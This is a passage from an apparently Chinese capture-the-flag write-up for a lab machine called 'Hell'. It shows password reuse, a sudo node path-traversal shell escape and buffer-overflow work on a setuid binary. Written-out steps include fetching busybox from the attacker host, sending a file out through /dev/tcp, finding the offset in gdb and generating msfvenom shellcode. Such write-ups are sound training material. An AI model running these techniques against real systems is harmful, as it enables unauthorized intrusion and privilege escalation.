Feb 16  2023 flag.txt\ndrwxrwxr-x 2 eddie eddie 4096 Feb 16  2023 report\neddie@hell:\/home\/eddie$ cat flag.txt \neddie@hell:\/home\/eddie$ \neddie@hell:\/home\/eddie$ cat flag.txt\neddie@hell:\/home\/eddie$ cd report\/\neddie@hell:\/home\/eddie\/report$ ls -la\ntotal 20\ndrwxrwxr-x 2 eddie eddie 4096 Feb 16  2023 .\ndrwxr-x--- 6 eddie eddie 4096 Feb 16  2023 ..\n-rw-rw-r-- 1 eddie eddie   83 Feb 16  2023 1\n-rw-rw-r-- 1 eddie eddie   70 Feb 16  2023 2\n-rw-rw-r-- 1 eddie eddie   48 Feb 16  2023 3\neddie@hell:\/home\/eddie\/report$ cd ..\neddie@hell:\/home\/eddie$ cd .cache\/\neddie@hell:\/home\/eddie\/.cache$ ls -la\ncdtotal 8\ndrwx------ 2 eddie eddie 4096 Feb 16  2023 .\ndrwxr-x--- 6 eddie eddie 4096 Feb 16  2023 ..\n-rw-r--r-- 1 eddie eddie    0 Feb 16  2023 motd.legal-displayed\neddie@hell:\/home\/eddie\/.cache$ cd ..\neddie@hell:\/home\/eddie$ cd .local\/\neddie@hell:\/home\/eddie\/.local$ ls -la\ntotal 12\ndrwxrwxr-x 3 eddie eddie 4096 Feb 16  2023 .\ndrwxr-x--- 6 eddie eddie 4096 Feb 16  2023 ..\ndrwx------ 3 eddie eddie 4096 Feb 16  2023 share\neddie@hell:\/home\/eddie\/.local$ cd share\/\neddie@hell:\/home\/eddie\/.local\/share$ ls -la\ntotal 12\ndrwx------ 3 eddie eddie 4096 Feb 16  2023 .\ndrwxrwxr-x 3 eddie eddie 4096 Feb 16  2023 ..\ndrwx------ 2 eddie eddie 4096 Feb 16  2023 nano\neddie@hell:\/home\/eddie\/.local\/share$ cd nano\/\neddie@hell:\/home\/eddie\/.local\/share\/nano$ ls -la\ntotal 8\ndrwx------ 2 eddie eddie 4096 Feb 16  2023 .\ndrwx------ 3 eddie eddie 4096 Feb 16  2023 ..\neddie@hell:\/home\/eddie\/.local\/share\/nano$ cd ..\/..\/..\/..\/\neddie@hell:\/home$ cd eddie\/\neddie@hell:\/home\/eddie$ ls -la\ntotal 40\ndrwxr-x--- 6 eddie eddie 4096 Feb 16  2023 .\ndrwxr-xr-x 7 root  root  4096 Feb 16  2023 ..\nlrwxrwxrwx 1 root  root     9 Feb 16  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 eddie eddie  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 eddie eddie 3771 Jan  6  2022 .bashrc\ndrwx------ 2 eddie eddie 4096 Feb 16  2023 .cache\ndrwxrwxr-x 3 eddie eddie 4096 Feb 16  2023 .local\n-rw-r--r-- 1 eddie eddie  807 Jan  6  2022 .profile\ndrwxrwxr-x 2 eddie eddie 4096 Feb 16  2023 .ssh\n-r-------- 1 eddie eddie  238 Feb 16  2023 flag.txt\ndrwxrwxr-x 2 eddie eddie 4096 Feb 16  2023 report\neddie@hell:\/home\/eddie$ cat .profile \neddie@hell:\/home\/eddie$ cd \/var\/mail\neddie@hell:\/var\/mail$ ls -la\ntotal 16\ndrwxrwsr-x  2 root    mail    4096 Feb 16  2023 .\ndrwxr-xr-x 14 root    root    4096 Feb 15  2023 ..\n-r--------  1 eddie   eddie    142 Feb 15  2023 eddie\n-r--------  1 pascual pascual  166 Feb 16  2023 pascual\neddie@hell:\/var\/mail$ cat eddie<\/code><\/pre>\n<p>\u8fd9\u662f\u5565\u60c5\u51b5\u554a\uff0c\u610f\u8bc6\u5230\u53ef\u80fd\u662f\u56e0\u4e3a\u4e4b\u524d\u7684\u90a3\u4e2a<code>\/tmp\/cat<\/code>\u5f71\u54cd\u4e86\u8fd9\u91cc\u7684cat\uff0c\u4f20\u4e00\u4e2a<code>busybox<\/code>\u4e0a\u53bb\uff1a<\/p>\n<h3>\u4e0a\u4f20busybox\u8bfb\u53d6\u4fe1\u606f[8]<\/h3>\n<pre><code class=\"language-bash\"># kali\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n172.20.10.3 - - [16\/Apr\/2024 15:40:12] &quot;GET \/busybox HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<pre><code class=\"language-bash\"># attacked\neddie@hell:\/tmp$ wget http:\/\/172.20.10.8:8888\/busybox\n--2024-04-16 19:40:13--  http:\/\/172.20.10.8:8888\/busybox\nConnecting to 172.20.10.8:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 1131168 (1.1M) [application\/octet-stream]\nSaving to: \u2018busybox\u2019\n\nbusybox                               100%[=========================================================================&gt;]   1.08M  --.-KB\/s    in 0.004s  \n\n2024-04-16 19:40:13 (293 MB\/s) - \u2018busybox\u2019 saved [1131168\/1131168]\n\neddie@hell:\/tmp$ busybox cat cat\nbash: \/tmp\/busybox: Permission denied\neddie@hell:\/tmp$ chmod +x busybox\neddie@hell:\/tmp$ busybox cat cat\n\/bin\/bash\neddie@hell:\/tmp$ cd \/home\/eddie\neddie@hell:\/home\/eddie$ busybox cat flag.txt \n\n\u2588\u2580\u2580\u2003\u2588\u2580\u2584\u2003\u2588\u2580\u2584\u2003\u2588\u2003\u2588\u2580\u2580\u2003\u2588\u2580\u2584\u2003\u2588\u2580\u2588\u2003\u2580\u2588\u2580\u2003\u2584\u2580\u2588\n\u2588\u2588\u2584\u2003\u2588\u2584\u2580\u2003\u2588\u2584\u2580\u2003\u2588\u2003\u2588\u2588\u2584\u2003\u2588\u2584\u2580\u2003\u2588\u2584\u2588\u2003 \u2588 \u2003\u2588\u2580\u2588\n\nFlag 8: HELL{R3L4T1V3_R0U735_4R3_FUN!}\n\neddie@hell:\/home\/eddie$ cd \/var\neddie@hell:\/var$ cd mail\neddie@hell:\/var\/mail$ busybox cat eddie \n\nFrom: ghost@hall.h4u\n\nHi eddie, can you see my hacked facebook account, I leave you the last password I remember: MySuperSecurePassword123!<\/code><\/pre>\n<h3>\u5bc6\u7801\u590d\u7528[9]<\/h3>\n<p>\u5f88\u660e\u663e\uff0c\u4f5c\u8005\u559c\u6b22\u8fdb\u884c\u5bc6\u7801\u590d\u7528\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u5207\u6362\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">eddie@hell:\/var\/mail$ cd \/home\neddie@hell:\/home$ ls -la\ntotal 28\ndrwxr-xr-x  7 root    root    4096 Feb 16  2023 .\ndrwxr-xr-x 19 root    root    4096 Feb 16  2023 ..\ndrwxr-x---  6 eddie   eddie   4096 Feb 16  2023 eddie\ndrwxr-x---  6 gato    gato    4096 Feb 16  2023 gato\ndrwxr-x---  5 ghost   ghost   4096 Feb 16  2023 ghost\ndrwxr-x---  5 pascual pascual 4096 Feb 16  2023 pascual\ndrwxr-x---  3 run     run     4096 Feb 16  2023 run\neddie@hell:\/home$ su root\nPassword: \nsu: Authentication failure\neddie@hell:\/home$ su gato\nPassword: \nsu: Authentication failure\neddie@hell:\/home$ su ghost\nPassword: \nghost@hell:\/home$ whoami;id\nghost\nuid=1001(ghost) gid=1001(ghost) groups=1001(ghost)\nghost@hell:\/home$ cd ghost\/\nghost@hell:~$ ls -la\ntotal 40\ndrwxr-x--- 5 ghost ghost 4096 Feb 16  2023 .\ndrwxr-xr-x 7 root  root  4096 Feb 16  2023 ..\nlrwxrwxrwx 1 root  root     9 Feb 15  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 ghost ghost  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 ghost ghost 3771 Jan  6  2022 .bashrc\ndrwx------ 2 ghost ghost 4096 Feb 15  2023 .cache\ndrwxrwxr-x 3 ghost ghost 4096 Feb 15  2023 .local\n-rw-r--r-- 1 ghost ghost  807 Jan  6  2022 .profile\ndrwxrwxr-x 2 ghost ghost 4096 Feb 16  2023 .ssh\n-r-------- 1 ghost ghost  243 Feb 16  2023 flag.txt\n-r-------- 1 ghost ghost  196 Feb 15  2023 message.txt\nghost@hell:~$ cat flag.txt \n\n\u2588\u2580\u2588\u2003\u2588\u2584\u2584\u2003\u2588\u2580\u2580\u2003\u2580\u2584\u2580\u2003\u2588\u2580\u2580\u2003\u2588 \u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2003\u2580\u2588\u2580\n\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003\u2588\u2580 \u2003\u2588 \u2588\u2003\u2588\u2584\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2584\u2588\u2003\u2584\u2588\u2003 \u2588 \n\nFlag 9: HELL{B14CKH47_H4CK3R_F4C3B00K_WTF?}\n\nghost@hell:~$ cat message.txt \n\nFrom: gatogamer1155@hell.h4u\n\nHi ghost, just a heads up I created a script in node.js that converts text to hexadecimal, I&#039;ll leave it at my home directory for you to try, it&#039;s called hex.js :)<\/code><\/pre>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">ghost@hell:~$ sudo -l\n[sudo] password for ghost: \nMatching Defaults entries for ghost on hell:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser ghost may run the following commands on hell:\n    (gato) \/usr\/bin\/node \/home\/gato\/*<\/code><\/pre>\n<h3>\u76ee\u5f55\u7a7f\u8d8a\u53cd\u5f39shell<\/h3>\n<p>\u56e0\u4e3a\u662f\u901a\u914d\u7b26\uff0c\u5c1d\u8bd5\u76ee\u5f55\u7a7f\u8d8a\u4e00\u4e0b\uff0c\u7136\u540e\u53c2\u8003https:\/\/gtfobins.github.io\/gtfobins\/node\/<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543131.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543131.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417035202855\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6784\u9020\u6267\u884c\uff1a<\/p>\n<pre><code>require(&quot;child_process&quot;).spawn(&quot;\/bin\/bash&quot;, {stdio: [0, 1, 2]})<\/code><\/pre>\n<pre><code class=\"language-bash\">ghost@hell:\/tmp$ sudo -l\nMatching Defaults entries for ghost on hell:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser ghost may run the following commands on hell:\n    (gato) \/usr\/bin\/node \/home\/gato\/*\nghost@hell:\/tmp$ sudo -u gato \/usr\/bin\/node \/home\/gato\/*\ninternal\/modules\/cjs\/loader.js:818\n  throw err;\n  ^\n\nError: Cannot find module &#039;\/home\/gato\/*&#039;\n    at Function.Module._resolveFilename (internal\/modules\/cjs\/loader.js:815:15)\n    at Function.Module._load (internal\/modules\/cjs\/loader.js:667:27)\n    at Function.executeUserEntryPoint [as runMain] (internal\/modules\/run_main.js:60:12)\n    at internal\/main\/run_main_module.js:17:47 {\n  code: &#039;MODULE_NOT_FOUND&#039;,\n  requireStack: []\n}\nghost@hell:\/tmp$ echo &#039;require(&quot;child_process&quot;).spawn(&quot;\/bin\/bash&quot;, {stdio: [0, 1, 2]})&#039; &gt; test.js\nghost@hell:\/tmp$ ls -la\ntotal 1160\ndrwxrwxrwt 11 root    root       4096 Apr 16 19:48 .\ndrwxr-xr-x 19 root    root       4096 Feb 16  2023 ..\ndrwxrwxrwt  2 root    root       4096 Apr 17  2024 .ICE-unix\ndrwxrwxrwt  2 root    root       4096 Apr 17  2024 .Test-unix\ndrwxrwxrwt  2 root    root       4096 Apr 17  2024 .X11-unix\ndrwxrwxrwt  2 root    root       4096 Apr 17  2024 .XIM-unix\ndrwxrwxrwt  2 root    root       4096 Apr 17  2024 .font-unix\n-rwxrwxr-x  1 eddie   pascual 1131168 Jan 17  2022 busybox\n-rwxrwxr-x  1 pascual pascual      10 Apr 16 19:31 cat\ndrwx------  2 root    root       4096 Apr 17  2024 snap-private-tmp\ndrwx------  3 root    root       4096 Apr 17  2024 systemd-private-11cedf6aef794959ad89d576ea13f137-systemd-logind.service-Eclsxi\ndrwx------  3 root    root       4096 Apr 17  2024 systemd-private-11cedf6aef794959ad89d576ea13f137-systemd-resolved.service-7lLCia\ndrwx------  3 root    root       4096 Apr 17  2024 systemd-private-11cedf6aef794959ad89d576ea13f137-systemd-timesyncd.service-BamRMR\n-rw-rw-r--  1 ghost   ghost        64 Apr 16 19:52 test.js\nghost@hell:\/tmp$ chmod +x test.js \nghost@hell:\/tmp$ sudo -u gato \/usr\/bin\/node \/home\/gato\/..\/..\/..\/..\/..\/tmp\/test.js\ngato@hell:\/tmp$ whoami;id\ngato\nuid=1000(gato) gid=1000(gato) groups=1000(gato)<\/code><\/pre>\n<p>\u62ff\u4e0b<code>gato<\/code>\u3002<\/p>\n<h3>\u4fe1\u606f\u641c\u96c6[10]<\/h3>\n<pre><code class=\"language-bash\">gato@hell:\/tmp$ cd \/home\/gato\/\ngato@hell:~$ ls -la\ntotal 48\ndrwxr-x--- 6 gato gato 4096 Feb 16  2023 .\ndrwxr-xr-x 7 root root 4096 Feb 16  2023 ..\nlrwxrwxrwx 1 root root    9 Feb 15  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 gato gato  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 gato gato 3771 Jan  6  2022 .bashrc\ndrwx------ 3 gato gato 4096 Feb 15  2023 .cache\ndrwxrwxr-x 3 gato gato 4096 Feb 15  2023 .config\nlrwxrwxrwx 1 root root    9 Feb 15  2023 .gdb_history -&gt; \/dev\/null\n-rw-rw-r-- 1 gato gato   30 Feb 15  2023 .gdbinit\ndrwxrwxr-x 3 gato gato 4096 Feb 15  2023 .local\n-rw------- 1 gato gato    0 Feb 15  2023 .node_repl_history\n-rw-r--r-- 1 gato gato  807 Jan  6  2022 .profile\nlrwxrwxrwx 1 root root    9 Feb 15  2023 .python_history -&gt; \/dev\/null\ndrwx------ 2 gato gato 4096 Feb 15  2023 .ssh\n-r-------- 1 gato gato  332 Feb 16  2023 flag.txt\n-r-------- 1 gato gato  400 Feb 15  2023 hex.js\ngato@hell:~$ cat flag.txt \n\n\u2588\u2580\u2580\u2003\u2584\u2580\u2588\u2003\u2580\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2580\u2003\u2584\u2580\u2588\u2003\u2588\u2580\u2584\u2580\u2588\u2003\u2588\u2580\u2580\u2003\u2588\u2580\u2588\u2003\u2584\u2588\u2003\u2584\u2588\u2003\u2588\u2580\u2003\u2588\u2580\n\u2588\u2584\u2588\u2003\u2588\u2580\u2588\u2003 \u2588 \u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003\u2588\u2580\u2588\u2003\u2588 \u2580 \u2588\u2003\u2588\u2588\u2584\u2003\u2588\u2580\u2584\u2003 \u2588\u2003 \u2588\u2003\u2584\u2588\u2003\u2584\u2588\n\nFlag 10: HELL{7H3_5UD03R5_15_N07_4_60D_1D34}\n\ngato@hell:~$ cat hex.js \nconst readline = require(&#039;readline&#039;);\nconst chalk = require(&#039;chalk&#039;);\n\nconst rl = readline.createInterface({\n  input: process.stdin,\n  output: process.stdout\n});\n\nrl.question(&#039;\\n[&#039; + chalk.blue(&#039;*&#039;) + &#039;] Enter string: &#039;, (text) =&gt; {\n  const buffer = Buffer.from(text, &#039;utf8&#039;);\n  console.log(&#039;\\n[&#039; + chalk.green(&#039;+&#039;) + &#039;] &#039; + `String hexadecimal: ${buffer.toString(&#039;hex&#039;)}` + &#039;\\n&#039;);\n  rl.close();\n});\ngato@hell:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/opt\/projects\/strlen\n\/usr\/bin\/fusermount3\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/sudo\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/snapd\/snap-confine\ngato@hell:~$ file \/opt\/projects\/strlen\n\/opt\/projects\/strlen: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=7efd2fcd861f24df4ff3e78bedfda45139486fe3, for GNU\/Linux 3.2.0, not stripped\ngato@hell:~$ ls -l \/opt\/projects\/strlen\n-rwsr-xr-x 1 root root 13064 Feb 15  2023 \/opt\/projects\/strlen<\/code><\/pre>\n<p>\u6267\u884c\u4ee5\u4e0b\u7a0b\u5e8f<\/p>\n<pre><code class=\"language-bash\">gato@hell:~$ cd \/opt\/projects\/\ngato@hell:\/opt\/projects$ .\/strlen \n\n\u2588\u2580\u2003\u2580\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2580\u2003\u2588\u2584 \u2588\n\u2584\u2588\u2003 \u2588 \u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\u2003\u2588 \u2580\u2588\n\n[-] Usage: .\/strlen &lt;string&gt;\n\ngato@hell:\/opt\/projects$ .\/strlen abcdef\n\n\u2588\u2580\u2003\u2580\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2580\u2003\u2588\u2584 \u2588\n\u2584\u2588\u2003 \u2588 \u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\u2003\u2588 \u2580\u2588\n\n[*] String: abcdef\n\n[+] Length: 6\n\ngato@hell:\/opt\/projects$ .\/strlen aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\n\u2588\u2580\u2003\u2580\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2580\u2003\u2588\u2584 \u2588\n\u2584\u2588\u2003 \u2588 \u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\u2003\u2588 \u2580\u2588\n\n[*] String: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\n[+] Length: 528\n\nSegmentation fault (core dumped)<\/code><\/pre>\n<h3>\u5206\u6790\u7a0b\u5e8f<\/h3>\n<p>\u5b58\u5728\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u4f20\u5230\u672c\u5730\u9006\u5411\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">cat strlen &gt; \/dev\/tcp\/172.20.10.8\/8888\nnc -lp 8888 &gt; strlen<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ file strlen\nstrlen: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=7efd2fcd861f24df4ff3e78bedfda45139486fe3, for GNU\/Linux 3.2.0, not stripped\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ checksec --file=strlen \nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE\nNo RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   39 Symbols        No    0               2               strlen<\/code><\/pre>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __int64 v3; \/\/ rbp\n  __int64 v5; \/\/ [rsp-8h] [rbp-8h]\n\n  __asm { endbr64 }\n  v5 = v3;\n  sub_401090(&amp;unk_402008, argv, envp);\n  if ( argc &lt;= 1 )\n    return sub_4010B0(&quot;\\n\\x1B[0;37m[\\x1B[0;31m-\\x1B[0;37m] Usage: %s &lt;string&gt;\\n\\n&quot;, *argv);\n  sub_4010C0(0LL);\n  return overflow(argv[1]);\n}<\/code><\/pre>\n<p>\u672c\u5730\u5c1d\u8bd5\u8c03\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ gdb-peda -q strlen  \nReading symbols from strlen...\n(No debugging symbols found in strlen)\ngdb-peda$ pattern create 300\n&#039;AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%&#039;\ngdb-peda$ run\nStarting program: \/home\/kali\/temp\/Hell\/strlen \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library &quot;\/lib\/x86_64-linux-gnu\/libthread_db.so.1&quot;.\n\n\u2588\u2580\u2003\u2580\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2580\u2003\u2588\u2584 \u2588\n\u2584\u2588\u2003 \u2588 \u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\u2003\u2588 \u2580\u2588\n\n[-] Usage: \/home\/kali\/temp\/Hell\/strlen &lt;string&gt;\n\n[Inferior 1 (process 114035) exited with code 0107]\nWarning: &#039;set logging off&#039;, an alias for the command &#039;set logging enabled&#039;, is deprecated.\nUse &#039;set logging enabled off&#039;.\n\nWarning: &#039;set logging on&#039;, an alias for the command &#039;set logging enabled&#039;, is deprecated.\nUse &#039;set logging enabled on&#039;.\n\nWarning: not running\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ gdb-peda -q strlen\nReading symbols from strlen...\n(No debugging symbols found in strlen)\ngdb-peda$ pattern_arg 300\nSet 1 arguments to program\ngdb-peda$ run\n[----------------------------------registers-----------------------------------]\nRAX: 0x7fffffffdf10 (&quot;AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;...)\nRBX: 0x7fffffffe148 --&gt; 0x7fffffffe40d (&quot;\/home\/kali\/temp\/Hell\/strlen&quot;)\nRCX: 0x15 \nRDX: 0x200400 \nRSI: 0x7fffffffe4ff (&quot;A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%&quot;)\nRDI: 0x7fffffffdfe6 (&quot;A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%&quot;)\nRBP: 0x2541322541632541 (&#039;A%cA%2A%&#039;)\nRSP: 0x7fffffffe018 (&quot;HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%&quot;)\nRIP: 0x401297 (&lt;overflow+117&gt;:  ret)\nR8 : 0x75 (&#039;u&#039;)\nR9 : 0x0 \nR10: 0x7ffff7dd3238 --&gt; 0x10001a00004244 \nR11: 0x7ffff7f1f090 (&lt;__strcpy_avx2&gt;:   vpxor  xmm7,xmm7,xmm7)\nR12: 0x0 \nR13: 0x7fffffffe160 --&gt; 0x7fffffffe556 (&quot;LESS_TERMCAP_se=\\033[0m&quot;)\nR14: 0x403220 --&gt; 0x401180 (&lt;__do_global_dtors_aux&gt;:    endbr64)\nR15: 0x7ffff7ffd000 --&gt; 0x7ffff7ffe2c0 --&gt; 0x0\nEFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n   0x401290 &lt;overflow+110&gt;:     call   0x401080 &lt;strcpy@plt&gt;\n   0x401295 &lt;overflow+115&gt;:     nop\n   0x401296 &lt;overflow+116&gt;:     leave\n=&gt; 0x401297 &lt;overflow+117&gt;:     ret\n   0x401298 &lt;_fini&gt;:    endbr64\n   0x40129c &lt;_fini+4&gt;:  sub    rsp,0x8\n   0x4012a0 &lt;_fini+8&gt;:  add    rsp,0x8\n   0x4012a4 &lt;_fini+12&gt;: ret\n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffe018 (&quot;HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%&quot;)\n0008| 0x7fffffffe020 (&quot;%IA%eA%4A%JA%fA%5A%KA%gA%6A%&quot;)\n0016| 0x7fffffffe028 (&quot;A%JA%fA%5A%KA%gA%6A%&quot;)\n0024| 0x7fffffffe030 (&quot;5A%KA%gA%6A%&quot;)\n0032| 0x7fffffffe038 --&gt; 0x7f0025413625 \n0040| 0x7fffffffe040 --&gt; 0x0 \n0048| 0x7fffffffe048 --&gt; 0x4011b6 (&lt;main&gt;:      endbr64)\n0056| 0x7fffffffe050 --&gt; 0x200000000 \n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\nStopped reason: SIGSEGV\n0x0000000000401297 in overflow ()<\/code><\/pre>\n<h4>\u67e5\u770b\u504f\u79fb\u91cf<\/h4>\n<pre><code class=\"language-bash\">gdb-peda$ x\/x $rsp\n0x7fffffffe018: 0x4133254164254148\ngdb-peda$ x\/wx $rsp\n0x7fffffffe018: 0x64254148\ngdb-peda$ pattern_offset 0x64254148\n1680163144 found at offset: 264<\/code><\/pre>\n<p><code>offset<\/code>\u5373\u4e3a264\u3002<\/p>\n<h4>\u5c1d\u8bd5\u8fdb\u884c\u9a8c\u8bc1<\/h4>\n<p>\u5148\u751f\u6210\u4e00\u6bb5shellcode\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ msfvenom -p linux\/x64\/exec CMD=\/bin\/sh -f python -v shellcode\n[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 44 